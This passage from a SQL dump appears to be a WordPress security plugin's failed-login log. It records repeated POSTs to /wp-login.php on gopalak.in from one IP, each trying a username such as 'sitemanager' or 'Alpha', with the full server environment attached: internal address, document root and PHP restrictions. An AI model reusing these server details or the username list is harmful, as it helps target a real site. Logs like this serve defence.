05:44:25'),(95807,2,'a:2:{s:8:\"username\";s:5:\"Alpha\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"109\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"56485\";s:11:\"REMOTE_ADDR\";s:12:\"43.205.255.0\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"109\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747093830.3687761;s:12:\"REQUEST_TIME\";i:1747093830;}}','43.205.255.0',1,'2025-05-13 05:20:32','2025-05-14 05:44:25'),(95808,4,'a:2:{s:8:\"username\";s:5:\"gamma\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"109\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"56487\";s:11:\"REMOTE_ADDR\";s:12:\"43.205.255.0\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"109\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747093830.376241;s:12:\"REQUEST_TIME\";i:1747093830;}}','43.205.255.0',1,'2025-05-13 05:20:32','2025-05-14 05:44:25'),(95809,3,'a:2:{s:8:\"username\";s:4:\"beta\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"107\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"56486\";s:11:\"REMOTE_ADDR\";s:12:\"43.205.255.0\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"107\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747093830.3746531;s:12:\"REQUEST_TIME\";i:1747093830;}}','43.205.255.0',1,'2025-05-13 05:20:32','2025-05-14 05:44:25'),(95810,5,'a:2:{s:8:\"username\";s:7:\"mercury\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"113\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"56492\";s:11:\"REMOTE_ADDR\";s:12:\"43.205.255.0\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"113\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747093832.0446241;s:12:\"REQUEST_TIME\";i:1747093832;}}','43.205.255.0',1,'2025-05-13 05:20:33','2025-05-14 05:44:25'),(95811,4,'a:2:{s:8:\"username\";s:5:\"gamma\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"108\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"49622\";s:11:\"REMOTE_ADDR\";s:12:\"43.205.255.0\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"108\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747094541.762701;s:12:\"REQUEST_TIME\";i:1747094541;}}','43.205.255.0',1,'2025-05-13 05:32:24','2025-05-14 05:44:25'),(95812,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"120\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"49619\";s:11:\"REMOTE_ADDR\";s:12:\"43.205.255.0\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"120\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747094541.762073;s:12:\"REQUEST_TIME\";i:1747094541;}}','43.205.255.0',1,'2025-05-13 05:32:24','2025-05-14 05:44:25'),(95813,3,'a:2:{s:8:\"username\";s:4:\"beta\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"106\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"49620\";s:11:\"REMOTE_ADDR\";s:12:\"43.205.255.0\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"106\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747094543.3124311;s:12:\"REQUEST_TIME\";i:1747094543;}}','43.205.255.0',1,'2025-05-13 05:32:24','2025-05-14 05:44:25'),(95814,2,'a:2:{s:8:\"username\";s:5:\"Alpha\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"108\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"49627\";s:11:\"REMOTE_ADDR\";s:12:\"43.205.255.0\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"108\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747094543.311738;s:12:\"REQUEST_TIME\";i:1747094543;}}','43.205.255.0',1,'2025-05-13 05:32:24','2025-05-14 05:44:25'),(95815,5,'a:2:{s:8:\"username\";s:7:\"mercury\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"112\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"49628\";s:11:\"REMOTE_ADDR\";s:12:\"43.205.255.0\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"112\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747094544.1547611;s:12:\"REQUEST_TIME\";i:1747094544;}}','43.205.255.0',1,'2025-05-13 05:32:25','2025-05-14 05:44:25'),(95816,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"119\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"58896\";s:11:\"REMOTE_ADDR\";s:12:\"43.205.255.0\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"119\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747095263.904496;s:12:\"REQUEST_TIME\";i:1747095263;}}','43.205.255.0',1,'2025-05-13 05:44:25','2025-05-14 05:44:25'),(95817,4,'a:2:{s:8:\"username\";s:5:\"gamma\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"113\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"58903\";s:11:\"REMOTE_ADDR\";s:12:\"43.205.255.0\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"113\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747095263.9047239;s:12:\"REQUEST_TIME\";i:1747095263;}}','43.205.255.0',1,'2025-05-13 05:44:25','2025-05-14 05:44:25'),(95818,2,'a:2:{s:8:\"username\";s:5:\"Alpha\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"113\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"58900\";s:11:\"REMOTE_ADDR\";s:12:\"43.205.255.0\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"113\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747095263.9045219;s:12:\"REQUEST_TIME\";i:1747095263;}}','43.205.255.0',1,'2025-05-13 05:44:25','2025-05-14 